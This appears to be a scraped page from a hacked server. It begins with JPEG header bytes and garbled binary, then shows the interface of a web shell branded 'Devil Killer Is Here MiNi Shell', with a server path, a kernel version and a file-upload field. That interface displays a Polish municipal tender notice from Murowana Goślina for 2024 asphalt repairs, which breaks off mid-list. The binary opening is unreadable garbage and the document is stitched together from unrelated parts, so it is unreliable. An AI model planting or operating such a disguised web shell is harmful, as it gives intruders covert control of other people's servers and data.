JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240203/0008987601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont cząstkowy nawierzchni bitumicznych na terenie <br/>miasta i gminy Murowana Goślina w 2024 roku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MUROWANA GOŚLINA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631258595</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Powstańców Wielkopolskich 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Murowana Goślina</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-095</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@murowana-goslina.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.murowana-goslina.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont cząstkowy nawierzchni bitumicznych na terenie <br/>miasta i gminy Murowana Goślina w 2024 roku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5e81b306-c2c8-11ee-a84d-d63fc4d19e65</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00089876</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-02-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00029956/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Remont cząstkowy nawierzchni bitumicznych na terenie miasta i gminy Murowana Goślina w 2024 roku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/883428 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/883428</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Postępowanie prowadzone jest w<br/> języku polskim w formie elektronicznej za pośrednictwem Platformy zakupowej pod adresem:<br/> https://platformazakupowa.pl/pn/murowana-goslina.<br/> 2.Zamawiający określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie zakupowej, tj.: a) stały<br/> dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, b) komputer klasy PC lub MAC o następującej<br/> konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS<br/> Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, c)zainstalowana dowolna przeglądarka internetowa (najlepiej najnowsza<br/> wersja), d) włączona obsługa JavaScript, e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf, f)<br/> platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8, g oznaczenie czasu odbioru danych przez<br/> platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem<br/> Głównego Urzędu Miar (źródłem czasu jest platforma), h) w razie używania kwalifikowanego podpisu elektronicznego - podłączony<br/> lub wbudowany do komputera czytnik karty kryptograficznej wydanej przez wystawcę certyfikatu używanego przez Wykonawcę. 3.<br/> Instrukcje korzystania z platformy dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania<br/> ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformy znajdują się pod linkiem:<br/> https://platformazakupowa.pl/strona/45-instrukcje.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/> 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/> swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia<br/> 4 maja 2016 roku, str. 1; zwanym dalej „RODO”) informujemy, że: Administratorem Pani/Pana/Państwa danych osobowych jest<br/> Burmistrz Miasta i Gminy Murowana Goślina, plac Powstańców Wielkopolskich 9, 62-095 Murowana Goślina;<br/> a) Administratorem Pani/Pana/Państwa danych osobowych jest Burmistrz Miasta<br/> i Gminy Murowana Goślina, plac Powstańców Wielkopolskich 9, 62-095 Murowana Goślina;<br/> b) dane kontaktowe inspektora ochrony danych: Urząd Miasta i Gminy, plac Powstańców Wielkopolskich 9, 62-095 Murowana<br/> Goślina, e-mail: inspektorochronydanych@murowana-goslina.pl;<br/> c) Odbiorcami Pani/Pana/Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/> postępowania w oparciu ustawę Pzp;<br/> d) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO<br/> w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: <br/>„Remont cząstkowy nawierzchni bitumicznych na terenie <br/>miasta i gminy Murowana Goślina w 2024 roku” nr postępowania: FZP.271.5.2024, prowadzonym w postępowaniu o udzielenie zamówienia klasycznego o wartości mniejszej niż progi<br/> unijne, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy, a po tym czasie przez okres zgodny z ustawą z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach lub innymi szczegółowymi przepisami prawa;<br/> e) obowiązek podania przez Pani/Pana/Państwa danych osobowych bezpośrednio Pani/Pana/ Państwa dotyczących jest wymogiem<br/> ustawowym określonym<br/> w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/> określonych danych wynikają<br/> z ustawy Pzp;<br/> f) w odniesieniu do Pani/Pana/Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie<br/> do art. 22 RODO;<br/> g) posiada/posiadają Pani/Pan/Państwo: na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana/Państwa dotyczących; na podstawie art. 16 RODO prawo do sprostowania Pani/Pana/Państwa danych osobowych (wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników); na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w<br/> odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego); prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/> osobowych Pani/Pana/Państwa dotyczących narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">h) nie przysługuje Pani/Panu/Państwu:<br/> w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/> Pani/Pana/Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>i) Zamawiający ponadto informuje:<br/> w przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1–3 rozporządzenia 2016/679, wymagałoby<br/> niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji<br/> mających w szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia, <br/>skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16<br/> rozporządzenia 2016/679, nie może naruszać integralności protokołu oraz jego załączników.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">FZP.271.5.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie zamówienia pn.: „Remont <br/>cząstkowy nawierzchni bitumicznych na terenie miasta i gminy <br/>Murowana Goślina w 2024 roku”. <br/>2. Szczegółowy opis przedmiotu zamówienia zawarto w Załączniku nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45236000-0 - Wyrównywanie terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający, w przypadku posiadania środków finansowych, przewiduje <br/>możliwość udzielenia zamówienia polegającego na powtórzeniu podobnych robót <br/>budowlanych do opisanych w SWZ – wymienionych w opisie przedmiotu <br/>zamówienia, w trybie art. 214 ust. 1 pkt 7 ustawy Pzp, tj. roboty budowlane objęte <br/>następującymi kodami CPV: <br/>45233140-2 Roboty drogowe, <br/>45233142-6 Roboty w zakresie naprawy dróg, <br/>45111200-0 Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne, <br/>45233220-7 Roboty w zakresie nawierzchni dróg, <br/>45233141-9 Roboty w zakresie konserwacji dróg, <br/>45233200-1 Roboty w sprawie różnych nawierzchni, <br/>45236000-0 Wyrównanie terenu <br/>1) planowany zakres przedmiotu zamówienia obejmuje: <br/>a) remont cząstkowy nawierzchni bitumicznych mieszanką mineralno-asfaltową z <br/>wytwórni do 5 cm głębokości, <br/>b) remont cząstkowy nawierzchni bitumicznych mieszanką mineralno-asfaltową z <br/>wytwórni od 5 cm do 8 cm głębokości, <br/>c) remont cząstkowy nawierzchni posiadającej wyboje o głębokości do 2 cm przy <br/>użyciu emulsji i grysów remonterami ciśnieniowymi typu patcher, <br/>d) remont cząstkowy rakowin przy użyciu emulsji i grysów, <br/>e) regulacja włazów studni kanalizacyjnych, <br/>f) wymiana i regulacja włazów studni kanalizacyjnych, <br/>10 <br/>g) regulacja wpustów kanalizacyjnych, <br/>h) wymiana i regulacja wpustów kanalizacyjnych, <br/>i) regulacja skrzynek zaworów wody i gazu, <br/>j) wymiana i regulacja skrzynek zaworów wody i gazu. <br/>Ww. zamówienia mogą zostać udzielone: <br/>a) maksymalnie do 90% wartości zamówienia podstawowego - w przypadku <br/>posiadania środków finansowych – w ramach kontynuacji przedmiotu <br/>zamówienia opisanego w SWZ i zgodnie ze sposobem jego realizacji zawartym <br/>w dokumentacji niniejszego postępowania, <br/>b) po negocjacjach z Wykonawcą wybranym w niniejszym postępowaniu, <br/>z zastrzeżeniem że ceny jednostkowe nie będą wyższe niż ceny zaoferowane <br/>w niniejszym postepowaniu, na podstawie odrębnie zawartej umowy, <br/>c) <br/>zamówienia powtórzone zostaną udzielone na warunkach analogicznych do <br/>warunków opisanych w dokumentacji niniejszego postępowania (również w <br/>zakresie kryteriów oceny ofert).</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpoczęcia napraw zwykłych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na przystąpienie do realizacji napraw awaryjnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin zabezpieczenia napraw awaryjnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie o aktualności informacji zawartych w oświadczeniu o niepodleganiu <br/>wykluczeniu – załącznik nr 4 do formularza ofertowego; <br/>2) oświadczenie Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP, o braku <br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 <br/>lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz.U. z 2023 r. poz. <br/>1689) z innym Wykonawcą, który złożył odrębną ofertę albo oświadczenie o <br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub <br/>informacjami potwierdzającymi przygotowanie oferty niezależnie od innego <br/>Wykonawcy należącego do tej samej grupy kapitałowej, w celu potwierdzenia braku <br/>podstawy do wykluczenia Wykonawcy z postępowania, o której mowa w art. 108 <br/>ust. 1 pkt 5 PZP – według załącznika nr 5 do formularza ofertowego; <br/>3) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, <br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne <br/>przepisy wymagają wpisu do rejestru lub ewidencji. W przypadku, gdy Wykonawca <br/>w formularzu ofertowym wskaże ogólnodostępne adresy stron internetowych, <br/>Zamawiający sam pobierze ww. dokumenty; <br/>4) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/>dokumentów dotyczących każdego z Wykonawców wspólnie ubiegających się o <br/>udzielenie zamówienia, w celu wykazania braku istnienia wobec niego podstaw <br/>wykluczenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w <br/>postępowaniu oraz o braku podstaw do wykluczenia z postępowania (uwzględniające <br/>przesłanki wykluczenia z art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie <br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa <br/>narodowego) zgodnie z Załącznikiem nr 1 do formularza ofertowego. Oświadczenie, o <br/>którym mowa w art. 125 ust. 1 ustawy Pzp stanowi dowód potwierdzający brak <br/>podstaw wykluczenia i spełnianie warunków udziału w postępowaniu na dzień składania <br/>ofert, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki <br/>dowodowe. <br/>UWAGA: w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców <br/>oświadczenie wstępne, o którym mowa w pkt 3.1) SWZ składa każdy z Wykonawców <br/>wspólnie ubiegających się o zamówienie. Oświadczenie to ma potwierdzać spełnianie <br/>warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w <br/>którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu <br/>oraz brak podstaw wykluczenia; <br/>2) oświadczenie Wykonawców wspólnie ubiegających się o zamówienie, z którego wynika, <br/>które roboty budowlane wykonają poszczególni Wykonawcy, sporządzone zgodnie ze <br/>wzorem zamieszczonym w Załączniku nr 3 do formularza ofertowego (tylko jeżeli <br/>dotyczy).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 2. Ofertę składa się na formularzu ofertowym – wg wzoru stanowiącego załącznik nr 3 do SWZ <br/>wraz z nw. dokumentami należy złożyć, za pośrednictwem Platformy: <br/>a) oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków w <br/>postępowaniu w zakresie wskazanym w SWZ – wg wzoru stanowiącego załącznik <br/>nr 1 do formularza ofertowego, <br/>b) formularz cenowy (kalkulacja ceny), wg wzoru stanowiącego załącznik nr 2 <br/>do formularza ofertowego, <br/>c) oświadczenie składane na podstawie art. 117 ust. 4 Pzp – wg wzoru <br/>stanowiącego załącznik nr 3 do formularza ofertowego (tylko jeżeli <br/>dotyczy), <br/>d) zobowiązanie podmiotu trzeciego (tylko jeżeli dotyczy) do oddania Wykonawcy <br/>do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia, jeśli <br/>Wykonawca powołuje się na zasoby podmiotu trzeciego w celu wykazania <br/>spełniania warunków udziału w postępowaniu. Ponadto Wykonawca, który powołuje <br/>się na zasoby podmiotu trzeciego, w celu wykazania braku istnienia wobec tego podmiotu podstaw wykluczenia oraz spełnienia – w zakresie, w jakim powołuje się <br/>na ich zasoby – warunków udziału w postępowaniu, zamieszcza informacje o tych <br/>podmiotach w oświadczeniu, o którym mowa w pkt 2 a) powyżej, <br/>e) oświadczenie podmiotu udostępniającego zasoby własne o niepodleganiu <br/>wykluczeniu oraz spełnianiu warunków udziału w postępowaniu (tylko jeżeli <br/>dotyczy) do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby <br/>realizacji zamówienia, jeśli Wykonawca powołuje się na zasoby podmiotu trzeciego <br/>w celu wykazania spełniania warunków udziału w postępowaniu, <br/>f) pełnomocnictwo lub inny dokument potwierdzający 